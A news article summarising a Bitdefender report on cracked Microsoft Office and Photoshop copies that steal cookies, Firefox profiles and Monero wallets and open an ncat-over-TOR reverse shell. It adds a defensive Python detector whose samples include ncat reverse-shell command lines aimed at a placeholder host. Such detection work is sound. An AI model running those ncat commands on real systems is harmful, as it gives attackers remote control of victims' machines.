Cracked software is not safe to use, and there are plenty of examples to prove it. Hackers often use cracked copies of legitimate programs to spread malware. Along with the program, the user may also get a trojan horse, a backdoor, or spyware. The latest such example involves cracked copies of Microsoft Office and Adobe Photoshop that harvest browser session cookies and Monero cryptocurrency wallets, according to a new Bitdefender report.
Hackers Using Cracked Microsoft Office and Adobe Photoshop to Spread Malware
It is no surprise that hackers decided to use these two particular programs to spread the information-stealing malware. Microsoft Office and Adobe Photoshop are widely used applications, and as such, their cracked versions are also used by thousands of users.
As a result of downloading the cracked copy of Microsoft Office or Adobe Photoshop, the user’s computer will be “equipped” with malware that steals browser session cookies, Firefox’s entire profile history, and Monero cryptocurrency wallets. The malware also opens a backdoor on the compromised system and turns off its firewall.
“Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a TOR proxy,” Bitdefender explained in a blog post. A batch file, chknap.bat, is also bundled with the cracked program.
“The tools work together to create a powerful backdoor that communicates through TOR with its command and control center: the ncat binary uses the listening port of the TOR proxy (‘--proxy 127.0.0.1:9075’) and uses the standard ‘--exec’ parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior),” the report said.
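As an added illustration (not code from Bitdefender or from this article), the Python example below flags process command lines that combine the two options quoted above: a program-execution option and a --proxy that points at the local machine. The sample command lines, PROGRAM.exe and host.example.invalid are constructed placeholders, and the short forms -e, -c and --sh-exec are ncat's other program-execution options, which the report does not mention.

```python
import ipaddress
import shlex

# ncat options that hand a program the connection's input and output
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}

def _is_loopback(hostport):
    """True when the host part of host[:port] is localhost or a loopback IP."""
    host = hostport
    if hostport.startswith("["):            # bracketed IPv6, e.g. [::1]:9075
        host = hostport[1:].split("]", 1)[0]
    elif hostport.count(":") == 1:          # IPv4 address or name with a port
        host = hostport.split(":", 1)[0]
    try:
        return host.lower() == "localhost" or ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False

def inspect_cmdline(cmdline):
    """Return findings for one process command line; an empty list means no match."""
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    proxy = program = None
    for i, tok in enumerate(tokens):
        name, _, value = tok.partition("=")   # accept --proxy X and --proxy=X
        arg = value or (tokens[i + 1] if i + 1 < len(tokens) else "")
        if name == "--proxy":
            proxy = arg
        elif name in EXEC_FLAGS:
            program = arg
    findings = ["exec:" + program] if program is not None else []
    if proxy and _is_loopback(proxy):
        findings.append("loopback-proxy:" + proxy)
    return findings

def is_proxied_shell(cmdline):
    """Both halves of the reported pattern: a program on the socket, sent via a local proxy."""
    return len(inspect_cmdline(cmdline)) == 2

# Constructed samples (not from the report); PROGRAM.exe and the host are placeholders.
SAMPLES = [
    r"C:\Users\Public\ncat.exe --proxy 127.0.0.1:9075 --exec PROGRAM.exe host.example.invalid 443",
    r"ncat.exe --proxy=[::1]:9075 -e PROGRAM.exe host.example.invalid 443",
    r"ncat.exe --proxy 10.0.0.5:3128 host.example.invalid 443",
    r'python.exe -c "print(1)"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_proxied_shell(line), inspect_cmdline(line))
```

Other tools reuse option names such as -e and --proxy, so a match is a triage signal to confirm against the process image and its parent process, not a verdict.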
Pirated Movies Distributed the Sathurbot Trojan
An older instance of a backdoor trojan targeting people who download pirated and cracked content (movies) is the Sathurbot trojan. The downloaded movie torrent would be a file with a video extension together with a visible codec pack installer and an explanatory text file. The torrent also has an apparent installer executable and a small text file. The end goal is to lure the potential victim into running the executable, which would load the Sathurbot DLL.